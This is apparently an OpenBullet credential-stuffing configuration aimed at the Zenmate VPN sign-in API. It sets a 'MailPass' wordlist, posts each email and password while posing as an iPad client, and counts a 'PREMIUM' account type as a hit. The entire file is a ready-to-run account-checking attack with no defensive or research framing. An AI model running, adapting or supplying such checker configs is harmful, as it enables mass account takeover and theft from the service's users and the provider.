[SETTINGS]
{
  "Name": "Zenmate VPN",
  "SuggestedBots": 5,
  "LastModified": "2018-05-06T13:11:44.8853836+02:00",
  "AdditionalInfo": "",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://api.zenguard.biz/v2/sign_in?locale=en" AutoRedirect=TRUE 
  CONTENT "install_id=4569E7C3-F187-46E9-8B93-69F32160D8E8&os_name=iOS&os_ver=9.2&client_name=iOS&client_ver=482&client_env=iPad&auth_method=user&auth_id=<USER>&auth_secret=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password" 
  KEYCHAIN Success OR 
    KEY "\"account_type\":\"PREMIUM\"" 
